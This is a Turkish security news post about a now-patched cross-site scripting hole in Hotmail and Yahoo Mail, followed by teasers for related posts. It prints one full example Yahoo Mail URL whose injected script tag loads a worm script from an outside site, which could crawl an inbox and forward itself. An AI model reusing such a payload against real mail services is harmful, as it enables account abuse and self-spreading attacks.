Hotmail ve Yahoomail virus tehdidi altında

0
conan
Web tabanlı email servislerinde yeni saptanan bir açık Melissa tipi virüslerin yayılmasına neden olabiliyor.
Açık kısaca şöyle tanımlanıyor. Kötü niyetli kullanıcı emailinin içerisinde web tabanlı servisin serverının bir linkini yerleştiriyor. Bu linkin ucunda ise kişinin inbox'ını gezebilecek ve de bu inbox'da gördüğü her email'e kötü niyetli bir kod yollayabilecek bir Javascript var.
Yahoomail için link örneği: http://us.f117.mail.yahoo.com/ym/ShowFolder?ET=1&YY=12345&inc=10&order=asd%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Gelelim işin asıl önemli boyutuna. Email içinde verilen link ile web tabanlı email servisinin serverının adresi aynı olduğundan (domain bazında) bu link hiçbir güvenlik yorumundan geçmeden kullanıcıya sunuluyor. (no domain bounding error) 2 haziran itibari ile her iki büyük web mail servisi de bu sorunu yamamış gibi gözüküyor.

Ayrıntılı bilgi:
- SideSport: Sorunu bulan kişinin sitesi
- SecurityFocusda bu konudaki haber

İlgili Yazılar

MS Windows İçin Açık Kodlu Antivirüs Yazılımı - ClamWin

ebola

Siz de benim gibi bir işyerinde istemeyerek de olsa MS Windows sistem yöneticiliği yapıyorsanız eminim virusler en önemli sorunlarınızdandır. İşyeriniz her sene "kapalı kodlu" yazılımlara dünyanın parasını saymaktadır.

Pek çok şeyin bir açık kodlu çözümü var ama bu antivirüs meselesinin yok diyorsanız yanılıyorsunuz. Eski dost ClamAV'nin MS Windows sürümü var. Adı ClamWin. Ben test amacı ile bir iki makineye kurdum ilk izlenimlerim olumlu, size de tavsiye ediyorum.

TÜBİTAK Milli Bir Yazılımla Şifrelemeli Cep Telefonu Geliştirdi

anonim

TÜBİTAK Ulusal Elektronik ve Kriptoloji Araştırma Enstitüsü (UEKAE), tamamen özgün ve milli bir yazılımla şifreleme özellikli cep telefonu geliştirdi.

İstanbul´da Siber Savaş (Hacking) Yarışması!

FZ

SİBER SAVAŞ OYUNLARI 2002 Başlıyor!

Sizleri, bilgisayarları korumak ya da güvenlik önlemlerini aşmak konusundaki becerilerinizi bir eğlenceye dönüştürecek "Siber Savaş Oyunları 2002"ye katılmaya davet ediyoruz.

Bilgisayar güvenliği alanındaki deneyiminizi göstermeye hazır mısınız?

19-21 Aralık 2002 tarihlerinde Istanbul Harbiye Kültür Merkezi (Askeri Müze)'de gerçekleştirilecek "VIII. Türkiye'de Internet Konferansı" (inet-tr'02) kapsamında düzenlenecek Siber Savaş Oyunları yarışmasında iki seçeneğiniz var:

Netsec Güvenlik Bülteni: Sayı 30 – 18.07.2010

anonim

Netsec ağ ve bilgi güvenliği listesi üyeleri tarafından hazırlanan güvenlik bülteninin 30. sayısı çıktı.

Ücretsiz Metasploit Eğitimi

parsifal

Backtrack geliştiricilerinin kurmuş olduğu Offensive Security grubunun, üzerinde zaman harcayarak hazırlamış oldukları ücretsiz eğitim serisininden bir yeni eğitim: Metasploit Unleashed - Mastering the Framework